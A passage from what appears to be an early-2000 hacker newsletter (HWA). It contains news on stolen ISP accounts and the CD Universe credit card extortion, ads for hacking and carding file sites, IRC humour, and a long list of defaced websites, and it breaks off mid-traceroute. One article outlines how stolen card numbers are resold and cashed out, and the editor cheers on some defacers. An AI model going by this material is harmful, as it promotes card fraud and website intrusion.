ISP." Unauthorized Changes? Most of all, users were most distressed about how an "upgrade" seemed to cause mostly harmful and unauthorized changes to their systems. "AOL made changes to my system that I would have never agreed to," Wohler said. AOL officials, however, claim that AOL 5.0 does not make any changes to anything, including settings, unless the user permits them. "AOL software allows users the ability to set AOL as their default," D'Amato said. "They must choose AOL to be their default Internet setting." @HWA 196.0 Teens steal thousands of net accounts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.computerworld.com/home/print.nsf/idgnet/000113DD2E Teens steal thousands of Net accounts By Ann Harrison 01/13/2000 A group of teen-age computer crackers allegedly used thousands of stolen Internet accounts to probe the networks of two national nuclear weapons laboratories, according to law enforcement authorities in California. At least five crackers, ages 15 to 17, compromised accounts at 17 Internet service providers in the U.S., Romania and Australia and used the accounts to attack nine targets including the Sandia and Oak Ridge National Laboratories and Harvard University, according to Capt. Jan Hoganson of the Sacramento Valley High-Tech Crimes Task Force in California. The crackers managed to gain root access to computers at Harvard, Hoganson said, but just scanned the national lab networks to look for vulnerabilities. The intruders stole 200,000 accounts alone from San Francisco-based Pacific Bell Internet Services for use in the attack. According to Hoganson, the stolen accounts were used to scan for open network ports at the labs, which could be used for subsequent attacks. Hoganson emphasized that the laboratory networks themselves weren't compromised. He said law enforcement authorities were notified of the scans Dec. 7, by an El Dorado Hills, Calif.-based Internet service provider called InnerCite, which had received complaints from the labs that accounts it hosted were used in the scans. "The feds say it was an unwelcome visit, but there was no criminal action committed," said Hoganson, who likened the action to nighttime intruders rattling the doorknobs of a locked business. "Fortunately, the ISP preserved the evidence," he said. Damian Frisby, a detective with the Sacramento Valley High-Tech Crimes Task Force, said the FBI is now contacting other service providers from which accounts were allegedly stolen. He said the young intruders, who allegedly belong to a cracking group called Global Hell, had been tracked down and contacted by authorities after they bragged of their exploits in Internet chat rooms. While no charges have yet been filed, Frisby said he expects that some of the attackers will eventually be charged with unlawful access of a computer and possibly grand theft. "One of the first things an ISP considers is to shut these people down -- which is great for security and stops the attack, but it makes it hard for us to track them down," said Frisby. "They should contact law enforcement, but they have to make the decision whether to track them down or cut them off, and we can't tell them what to do." Frisby noted that while some of the compromised Internet service providers had chosen to cooperate with law enforcement, one, PSINet Inc. in Herndon, Va., demanded a search warrant before taking any action. "We don't want to violate anyone's rights, but it delays the process," said Frisby. PSINet wasn't available to comment on the request. While the investigation is ongoing, Frisby said service providers should guard against the theft of account data by taking care to update operating systems with current security patches and maintain effective firewalls. "It is a hard job to do because there are new exploits everyday," he said. Frisby added that many of the compromised Pac Bell accounts used passwords that were easy to uncover using standard dictionary programs that search for known words. He said the attackers somehow obtained a list of 200,000 Pac Bell user accounts and were able to successfully steal the passwords for about 95,000 accounts. Michelle Strykowski, a spokeswoman for Pacific Bell Internet Services, a subsidiary of SBC Communications Inc., based in San Antonio, disputed the number of compromised passwords. Strykowski said 63,000 passwords had been decoded, but Pac Bell was still unsure how the accounts were compromised. She said there has been no indication that the account information has been abused elsewhere and no customers have complained. According to Strykowski, the company sent an advisory to customers Jan. 7, warning of a security breach and advising them to change their passwords to include uppercase and lowercase characters, symbols and numbers, which makes them more difficult to crack. She said Pac Bell's 330,000 California Internet customers were also advised to change their passwords every 90 days and to not use the same passwords for a number of different accounts. "Security is a top priority for Pacific Bell, and we are working closely with the police, but these hackers have proved to the Internet as a whole that we must maintain vigilance," said Strykowski, who noted that the Global Hell cracking group had also compromised Web sites at the FBI and the White House. "All other ISPs, like Pac Bell, have to constantly scrutinize security and make recommendations to customers to be responsible Internet users and change their passwords." @HWA 197.0 Online Credit Hacker May Be Out For Profit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.apbnews.com/newscenter/internetcrime/2000/01/14/hack0114_01.html Online Credit Hacker May Be Out for Profit Investigator Thinks 'Maxus' Is a Two-Person Team Jan. 14, 2000 By David Noack NEW YORK (APBnews.com) -- While a computer hacker maintains that he stole credit card numbers from an online retailer as revenge for poor service and a couple of broken CDs, a security expert believes that "Maxus" is actually a two-man team in Russia engaged in a well-organized credit card fraud. In an e-mail message to APBnews.com, Maxus gave his motives for hacking into CD Universe's customer credit card database. He acknowledged stealing 300,000 card numbers and trying to extort $100,000 from the company by threatening to post the information online. "They send me two broken CDs, and I conclude test of their site for bugs. ... Their service is not good. Amazon is better," he said. In an e-mail exchange, Maxus said he might post more of the pilfered credit card numbers online, and he claimed that he still can get into the CD Universe database if he wants. "They can't fix it without me," Maxus boasted. Admits one previous theft Maxus also said he has stolen credit card information once before, in 1997. He claimed he got 20 then but declined to say where they were from or what he did with the information. He said he is using a computer with Windows 2000, Solaris and a Pentium III. Attempts to reach Maxus with additional questions and clarifications were unsuccessful. Brad Greenspan, chairman of e-Universe, the parent company of CD Universe, could not be reached for comment. Does Maxus have associates? Meanwhile, AntiOnline, an online computer security publication and consulting firm, which conducted its own investigation into the hacking incident, suspects the operation is more organized and widespread than Maxus concedes. John Vranesevich, the founder of AntiOnline, said that Maxus does not work alone. "We believe there are about a dozen that are close to Maxus. We don't have any hard evidence, but that is the impression we get. There are also some in Canada," said Vranesevich. He said the Web page that Maxus set up initially, which included some of the stolen credit card numbers as part of the extortion threat against CD Universe, was really an effort to peddle or advertise the credit card numbers to buyers. A four-layered scheme? The credit card scheme, says AntiOnline, has four parts: Maxus' partners first buy the numbers in wholesale lots of $1,000 for $1 a number. The card numbers are resold in blocks of 50 for a round price of $500. First-round buyers who keep numbers for themselves must pay Maxus a hefty kickback. AntiOnline believes Maxus uses "CyberCash" software to set himself up as an online merchant, entering the stolen numbers as if customers in his store were using the cards. In this case, the software "sees to it that the stolen credit cards are charged, and that the 'merchant' or in this case, 'thief,' gets the funds 'owed to him' electronically deposited into a bank account," Vranesevich reported in AntiOnline. The "final buyers" of the card numbers use them to access online pornography sites or for online gambling. They also can order computer equipment online. Finds two partners Vranesevich believes he has identified Maxus as Maxim Ivancov, and also another individual, who is called Diagnoz or Evgenij Fedorov, who may be in his 30s. Both have set up accounts at either banks or money transfer companies in order to complete the transactions. AntiOnline recommends that any user who shopped at CD Universe cancel their credit cards immediately. Vranesevich said that information from the AntiOnline investigation has been turned over to the FBI. He declined to say with which FBI office he was working. "The fact that CD Universe or the credit card companies would suggest to anyone that they could keep these credit cards accounts until they notice suspicious activity is ridiculous," said Vranesevich. May be at risk from Russian mob William Callahan, president of Unitel, a multinational investigative and security company, suspects that the Russian hackers are a small group and their greatest threat is not from law enforcement, but from Russian mobsters. "This is a small crowd of young Russian hackers who are incredibly adapt at computer stuff, they have no scruples and are just having fun stealing money," said Callahan. However, he cautioned, once organized crime in Russia gets wind of what they are doing, they will muscle in on the operation. "They will use them and extort them. They have to watch over their shoulder. [The Russian mobsters] are always looking for ways to launder money offshore," said Callahan, a former federal prosecutor. Purdue University professor Eugene Spafford, director of a new multidisciplinary center designed to tackle issues related to information security, finds Maxus' story of a revenge hack "plausible." "I do not know where the liability lies, because I do not know for certain where 'Maxus' got the numbers -- if he did -- nor do I know how," Spafford said. "If the story is as he presented it, then there is some blame to be laid at the merchant, and some with the company that provided the e-commerce software." @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ _ _ /\ | | | | (_) (_) / \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _ / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` | / ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| | /_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, | __/ | |___/ ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG ______________________________________________________________ French Hackers' Portal / Le Portail Des Lascars Francophones Links and News of interest / Liens et news pour lascars. ;-) -------------------------------------------------------------- ->->->->->->->->-> http://lascars.cjb.net <-<-<-<-<-<-<-<-<- ______________________________________________________________ http://revenger.hypermart.net ±±± ±±±±± ± ± ±±±±±±± ±± ± ±±±±±± ±±±±± ±±± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ±± ± ± ± ±± ±±± ± ± ±±±±±±± ± ± ± ± ±±± ±± ± ± ± ± ± ± ± ± ± ± ±±± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ± ±±±±± ± ±±±±±±± ± ±± ±±± ±±±±± ± ± 's T E X T Z F I L E HOMEPAGE http://revenger.hypermart.net Here you may find up to 340 text files for: ANARCHY , HACKING , GUIDES , CRACKING , VIRUS , GENERAL , ELECTRONICS , UNIX , MAGAZINES , TOP SECRET , CARDING , U.F.O.s , LOCKPICKING , IRC , PHREAKING , BOOKS AND A-S FILES AVAILABLE! http://revenger.hypermart.net Visit Us Now ! . . ............... . : : . . . . . . __:________ : : ___________ . . . \ < /_____:___ : ( < __( :_______ ) : )______:___\_ (___( : / =====/________|_________/ < | : (________________(====== : (__________________) :wd! . : : : - / - w w w . h a c k u n l i m i t e d . c o m - / - : . . . . . : : . . . . . :...............: . . ************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ************************************************************************** +------------------------------------------------------------------------+ | SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ** * www.csoft.net webhosting, shell, unlimited hits bandwidth ... * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * * * http://www.csoft.net/ * * * * One of our sponsors, visit them now * * * * * * * * * ** * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* http://www.ircnews.com/ Vol 1 Issue 1 Jan 3, 2000 Funny Story Gets Cut/Pasted To Channel 28 Times CINCINNATI, OH - A C/NET News.com story relating to another huge goof-up made by Microsoft's free email service, Hotmail.com, excited chatters on irc.openprojects.net's #linuxhelp channel. In fact, the people enjoyed the story so much that it got posted 28 times by various people. The initial joy the story brought to #linuxhelp was quickly offset as tempers flared and the channel administration hastily +moderated the channel in an effort to restore order in the out-of-control chat room. "Fuck off.", said MbM, immediately after setting the +m. "We all have browsers, we don't need people posting the story every 30 seconds." Witnesses claimed that there was no initial response from the #linuxhelp regulars to MbM's actions, because "nobody had been +voiced". The chat room was described as "very quiet". IRCNews.com learned that the cut and pasted story was in regards to Microsoft forgetting to pay the $35 registration fee for the passport.com domain name (the authentication part of Hotmail.com), leaving millions of people without access to their email. A Linux programmer forked out the $35 on behalf of Microsoft, and the popular freemail service was back in business. Everyone agreed that the News.com story was "very funny". One #linuxhelp regular named kernel_ said that it came as little surprise to anyone that people would want to cut and paste it. "OMG, okay. PiNkEyE tells me to go check out this story about M$ and Hotmail, so I do, and it's hysterical. So I post the URL to #linuxhelp, and about 2 minutes later, all hell broke loose!" kernel_ added, "At first I saw a few hahaha's and LOL's. Then people start posting parts of the article to the channel. Before I knew it, people are tripping out and probably a hundred lines of text was scrolling by every 5 seconds! It got out of control." "It all happened so fast.", commented Etriaph, also a #linuxhelp regular. "I remember getting up to make some Pop-Tarts and I come back and like quotes are flying all over, people are saying shut up, fights are breaking out, more quoted text, people leaving the channel to avoid the spam. It was like a warzone." MbM quickly stepped in to restore peace to the chat room. After several reported attempts to calm the channel by telling people to "stop that", MbM was left with no choice but to +moderate, which he did. MbM's quick thinking may have saved thousands of lines of spam from being shown to the 40 or so people visiting #linuxhelp at the time. When asked for his version of the events, MbM told IRCNews.com to "Fuck off." -=- Submitted by Black Dome: <oscillator> no my winunix98 is eleet <oscillator> i call it winix <tcp-ip> winix? <oscillator> hell yea <oscillator> all microsoft made! <oscillator> my aol is flying on it <tcp-ip> is it pretty good? <oscillator> very good <tcp-ip> where you get ti? <oscillator> my aol punters and scrollers work well on it, and it even comes with a warez server! <tcp-ip> where you get it? <oscillator> i wrote most of it myself of course. on vb Max the SysOp (oscillator) ----------------------------------------------- One OS to rule them all, One OS to find them. One OS to call them all, And in salvation bind them. In the bright land of Linux, Where the hackers play. (J. Scott Thayer, with apologies to J.R.R.T.) And of course... The 'Free Trout' site.. <heh> http://freetrout.bow.org/ @HWA =-----------------------------------------------------------------------= _ _ ___(_) |_ ___ ___ / __| | __/ _ Y __| \__ \ | || __|__ \ |___/_|\__\___|___/ SITE.1 #! GRASS ROOTS SECURITY SITE http://www.linuxsecurity.com/ Runby: Pr0xy Brand new Check this out! krad layout, lots of info, definately a place to add to your security bookmarks. Go there today! #2 COMMERCIAL SECURITY SITE: http://www.securiteam.com/ Nice security related site, just found it recently. check it out. lots of info. - Ed #3 DAMAGE INC. http://surf.to/damage_inc Hack/Phreak Zine, nice flash site, but not overcrowded with graphics checking out the content now .. - Ed You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ ___| _ \ | | __| _` |\ \ / | | __| _ \ _` | | | ( | ` < | | | __/ ( | \____|_| \__,_| _/\_\\___/ _| \___|\__,_| Note: The hacked site reports stay, especially wsith some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< Defaced domain: www.waterworld.org Site Title: Ron Kobasa Mirror: http://www.attrition.org/mirror/attrition/2000/01/16/www.waterworld.org Defaced by: wkD Operating System: Linux Defaced domain: www.coolmail.com Site Title: Coolmail Partners Mirror: http://www.attrition.org/mirror/attrition/2000/01/16/www.coolmail.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.cypoc.com Site Title: CYPOC Mirror: http://www.attrition.org/mirror/attrition/2000/01/17/www.cypoc.com Defaced by: Team China Operating System: Solaris 2.6 - 2.7 Potentially offensive content on defaced page. Defaced domain: www.gbrmpa.gov.au Site Title: Great Barrier Reef Marine Park Authority Mirror: http://www.attrition.org/mirror/attrition/2000/01/17/www.gbrmpa.gov.au Defaced by: 404 Crew Operating System: Solaris (PHP/4.0B2 mod_ssl/2.4.5 OpenSSL/0.9.4) Potentially offensive content on defaced page. Defaced domain: predator-vs-aliens.com Site Title: predator vs aliens Mirror: http://www.attrition.org/mirror/attrition/2000/01/17/predator-vs-aliens.com Defaced by: Cyberia / TerrorNet Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.madfishinc.com Site Title: Mad Fish Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/17/www.madfishinc.com Defaced by: wkD Operating System: Linux Potentially offensive content on defaced page. Defaced domain: thomas.loc.gov Site Title: US Congress Web site Mirror: http://www.attrition.org/mirror/attrition/2000/01/17/thomas.loc.gov Defaced by: LmT and r00tcrew Operating System: Unix FREE KEVIN reference in the HTML Potentially offensive content on defaced page. Attrition comment: This is the Library of Congress THOMAS Web site Defaced domain: www.ifi.gov.co Mirror: http://www.attrition.org/mirror/attrition/2000/01/18/www.ifi.gov.co Defaced by: IDK Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: wrox.boston.k12.ma.us Site Title: West Roxbury High School Mirror: http://www.attrition.org/mirror/attrition/2000/01/18/wrox.boston.k12.ma.us Defaced by: Team Echo Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.audi.de Site Title: Audi AG Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.audi.de Defaced by: LmT Operating System: Solaris Potentially offensive content on defaced page. Attrition comment: This is the same group that defaced the THOMAS site Defaced domain: kent.handysoft.co.kr Site Title: Handy Soft Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/kent.handysoft.co.kr Defaced by: tkz Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.gartlandfoundry.com Site Title: Gartland Foundry Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.gartlandfoundry.com Defaced by: pariah Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.idlecreek.com Site Title: Idle Creek Development, Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.idlecreek.com Defaced by: pariah Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.culinaryinstitute.com Site Title: Institute of Culinary Arts Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.culinaryinstitute.com Defaced by: Team Echo Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.emcoin.com.ar Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.emcoin.com.ar Operating System: BSDI Potentially offensive content on defaced page. Defaced domain: www.redetec.org.br Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.redetec.org.br Defaced by: OHB Team Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.rsl.com Site Title: Rochester Systems Ltd. Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.rsl.com Defaced by: lysergik Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.rsl.com Site Title: Rochester Systems Ltd. Mirror: http://www.attrition.org/mirror/attrition/2000/01/19/www.rsl.com Defaced by: lysergik Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: rachelsnetwork.com Site Title: Rachel's Network Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/rachelsnetwork.com Defaced by: ph Operating System: BSD/OS Defaced domain: www.vnuhcm.edu.vn Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.vnuhcm.edu.vn Defaced by: Team-Echo Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.bacards.pvt.k12.mn.us Site Title: Minnesota K12 Schools Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.bacards.pvt.k12.mn.us Defaced by: bobabc Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.simplewarez.com Site Title: Pedro Lucas Rocha Bessa Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.simplewarez.com Defaced by: bobabc Operating System: Linux Potentially offensive content on defaced page. Defaced domain: clea.wipo.int Site Title: World Intellectual Property Organization, Database of Intellectual Property Laws Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/clea.wipo.int Defaced by: phiber Operating System: Windows NT Defaced domain: www.ivi.org Site Title: The International Vaccine Institute Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.ivi.org Defaced by: confusion Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: pericles2.europarl.eu.int Site Title: European Parlement (site 2) Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/pericles2.europarl.eu.int Defaced by: confusion Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.pcmac.com Site Title: PC Mac Consultants Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.pcmac.com Defaced by: confusion Operating System: Windows NT Previously defaced on 99.11.28 by cipher Potentially offensive content on defaced page. Defaced domain: pericles1.europarl.eu.int Site Title: European Parliament Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/pericles1.europarl.eu.int Defaced by: confusion Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.bluehat.com Site Title: BlueHat Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.bluehat.com Defaced by: Klept0 Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: mail.wateye.com Site Title: Watauge Eye Center, PA Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/mail.wateye.com Defaced by: Screaching Weasel Operating System: Red Hat Linux Potentially offensive content on defaced page. Defaced domain: secure.411now.net Site Title: Internet Marketing Solutinos of Florida Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/secure.411now.net Defaced by: m0zy Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.mct.nu Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.mct.nu Defaced by: vorlon Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.saclant.nato.int Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.saclant.nato.int Defaced by: confusion Operating System: Windows 95 (Simple, Secure Web Server 1.1) Potentially offensive content on defaced page. Defaced domain: ioc.unesco.org Site title: UNESCO's Intergovernmental Oceanographic Commission Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/ioc.unesco.org Defaced by: confusion Operating System: Windows NT 4.0 Potentially offensive content on defaced page. Defaced domain: www.lutherancentraldist.org Site Title: Lutheran Church-Canada, Central District Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.lutherancentraldist.org Defaced by: Anti_Taco Operating System: Windows (Microsoft-PWS-95/2.0) Potentially offensive content on defaced page. Defaced domain: www.homeport.bc.ca Site Title: Bazan Bay o/a HomePort Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.homeport.bc.ca Defaced by: KabraLzZ Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: bps.boston.k12.ma.us Site Title: Massachusetts K12 Schools Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/bps.boston.k12.ma.us Defaced by: BoBaBc Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.perfectsite.com.br Site Title: CONSERVADORA E INSTALADORA DE MAQUINAS E APARELHOS Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.perfectsite.com.br Defaced by: KabraLzZ Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.weatherford.com Site Title: Weatherford Entra Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.weatherford.com Defaced by: Team Echo Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.conferencecoll.com Site Title: Conference Coll, Inc Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/www.conferencecoll.com Defaced by: p(H) Operating System: BSDI Potentially offensive content on defaced page. Defaced domain: rgshaw.boston.k12.ma.us Site Title: Massachusetts K12 Schools Mirror: http://www.attrition.org/mirror/attrition/2000/01/20/rgshaw.boston.k12.ma.us Defaced by: Team Echo Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.torahacademy.org Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.torahacademy.org Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.21 99.12.19 by Potentially offensive content on defaced page. Defaced domain: www.homeport.bc.ca Site Title: Bazan Bay o/a HomePort Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.homeport.bc.ca Operating System: Windows NT (IIS/4.0) Previously defaced on today by Potentially offensive content on defaced page. Defaced domain: www.mms.gov Site Title: MMS Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.mms.gov Defaced by: forrest Operating System: Windows NT (IIS/4.0) Previously defaced on 99.10.29, 99.10.28, 99.12.31 by fuqrag, fuqrag, hv2k Potentially offensive content on defaced page. Defaced domain: www.ibe.ane.ru Site Title: Institute of Business & Economics, Russia Academy of National Economy Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.ibe.ane.ru Defaced by: sh00ter Operating System: Windows NT Defaced domain: www.tsururestaurant.com Site Title: Trusu Restaurant Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.tsururestaurant.com Defaced by: lysergik Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.cisasailing.org Site Title: CISA Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.cisasailing.org Defaced by: Team Echo Operating System: Windows NT (WebSitePro) Potentially offensive content on defaced page. Defaced domain: www.telematic.edu.pe Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.telematic.edu.pe Defaced by: Team Echo Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.yepp.com Site Title: Yorktown Printing Corp Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.yepp.com Defaced by: lysergik Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.sd.fisc.navy.mil Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.sd.fisc.navy.mil Defaced by: DHC Operating System: WinNT Defaced domain: www.infopuc.pucp.edu.pe Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.infopuc.pucp.edu.pe Defaced by: Team Echo Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.dabassment.com Site Title: FREDC NOSE Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.dabassment.com Operating System: Solaris 2.x Potentially offensive content on defaced page. Defaced domain: www.redhotprice.com Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.redhotprice.com Defaced by: lysergik Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.yorktownchamber.org Site Title: New Yorktown Chamber of Commerce Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.yorktownchamber.org Defaced by: lysergik Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.nypennysaver.com Site Title: Yorktown ELectronic Publishing Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.nypennysaver.com Defaced by: lysergik Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.pennysaver.net Site Title: Yorktown Electronic Publishing Mirror: http://www.attrition.org/mirror/attrition/2000/01/21/www.pennysaver.net Defaced by: lysergik Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.kaplan.com.co Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.kaplan.com.co Defaced by: sh00tR Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.globaltex.org Site Title: Globaltex Corp Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.globaltex.org Defaced by: pH Operating System: BSDI Potentially offensive content on defaced page. Defaced domain: www.safersex.co.za Site Title: Safer Sex Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.safersex.co.za Defaced by: #Dorknet Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.cdcs.com Site Title: C & D Consulting, LLC Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.cdcs.com Defaced by: slash Operating System: WIndows NT (IIS/4.0) Previously defaced on 99.11.14 by DHC Potentially offensive content on defaced page. Defaced domain: www.ipuf.sc.gov.br Site Title: Universidade Federal de Santa Catarina Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.ipuf.sc.gov.br Defaced by: Fuck Spy Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.mitinci.gob.pe Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.mitinci.gob.pe Defaced by: Shredder Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.cpa.sp.gov.br Site Title: Governo Do Estado De Sao Paulo Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.cpa.sp.gov.br Defaced by: Fuck SPy Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.transportes.gov.br Site Title: Ministerio Dos Transportes Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.transportes.gov.br Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.psemu.com Site Title: The New Planet Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.psemu.com Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.cra.ed.cr Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.cra.ed.cr Defaced by: Team Echo Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.ajga.org Site Title: American Junior Golf Association Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.ajga.org Defaced by: lysergik Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.armeniansisters.org Site Title: Armenian Sisters' Academy Mirror: http://www.attrition.org/mirror/attrition/2000/01/22/www.armeniansisters.org Defaced by: HijAk Team Operating System: BSDI Potentially offensive content on defaced page. The alleged hacks of: http://www.armeniansisters.org http://www.usabia.org http://www.armgate.com http://www.armtv.com have been determined to be hoaxes. The group claiming to do it called themselves "hijak team". Looking at the NIC registry for the first two domains: Registrant: US-Armenia Business & Investment Association (USABIA-DOM) hijak st azerbaina for ever Baku, Az 3700001 AZ Domain Name: USABIA.ORG Administrative Contact, Technical Contact, Zone Contact: netninja, Sanjay (SP335) infowar@ANTIONLINE.ORG 99412666666 (FAX) 94412666666 Billing Contact: netninja, Sanjay (SP335) infowar@ANTIONLINE.ORG 99412666666 (FAX) 94412666666 Combine that with the second two domains (which appear to be legitimate), and the fact that the first two were hosted on free servers (Hypermart), it appears this group and their actions are a big hoax. forced ~$ traceroute www.usabia.org traceroute to 